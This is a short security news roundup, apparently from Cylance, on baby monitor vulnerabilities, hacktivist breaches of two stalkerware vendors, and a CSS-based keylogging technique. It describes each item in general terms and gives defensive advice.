This Week in Security: Internet Peek-a-Boo and Stalkerware Burn

Internet of Peek-a-Boo

The Internet of Things (IoT) has provided wonderful conveniences in our daily lives. But IoT devices also come with a dark side that bring us one step closer to the Black Mirror universe. This week’s Internet of Terrible Things explores Internet connected baby monitors.

The team at SEC Consult uncovered a number of issues for a suite of “smart” (read: stupid Internet connected device) baby monitors that affect over 52,000 users. The vulnerabilities include weak default credentials which may lead to yet another IoT botnet similar to Mirai, and using outdated software containing known vulnerabilities.

Even worse, the researchers attempted to notify the device vendor but did not receive any response. The lack of concern or response speaks for itself when appraising how much these vendors care about your security and privacy.

The last thing you need is for an attacker to be watching you through the baby monitor when you’re caring for your young ones. We’re losing the war against IoT security but you can take some small steps to protect yourself.

Stalkerware Burn Notice

Hot on the heels of last week’s news of Retina-X’s server destruction, hacktivists have struck two additional spyware companies, Mobistealth and Spy Master Pro. These companies develop and sell mobile malware for the purposes of spying on your loved (?) ones by collecting GPS location, voice recordings, and text messages.

The unknown hacktivists delivered a cache of data exfiltrated from the spyware servers and verified as authentic by Motherboard. Smartphones are a crucial part of our daily lives and provide access to not only the vast Internet, but to all of the services we rely on such as banking and security. Mobile malware can be extremely powerful because of this access and the various features it can hijack, such as microphones and cameras.

Always maintain physical control of your phone and don’t plug your phone into random USB charging ports. If you must charge your phone via an untrusted USB port, consider purchasing a SyncStop or use a USB cable which only provides power (these cables don’t have the data transmission lines).

Keylogging With Style

Cascading Style Sheets (CSS) are used to make your webpages look pretty, but it turns out they can also be used to record your keystrokes, as one clever security researcher discovered. The issue lies in frontend JavaScript frameworks such as ReactJS which sync HTML values allowing the CSS to issue requests for new images based on the value entered. This clever technique is all done behind the scenes automatically by the browser.

Website admins should update their affected JS frameworks once a fix is available.

About the Cylance Research and Intelligence Team

The Cylance Research and Intelligence team explores the boundaries of the information security field identifying emerging threats and remaining at the fore front of attacks. With insights gained from these endeavors, Cylance stays ahead of the threats.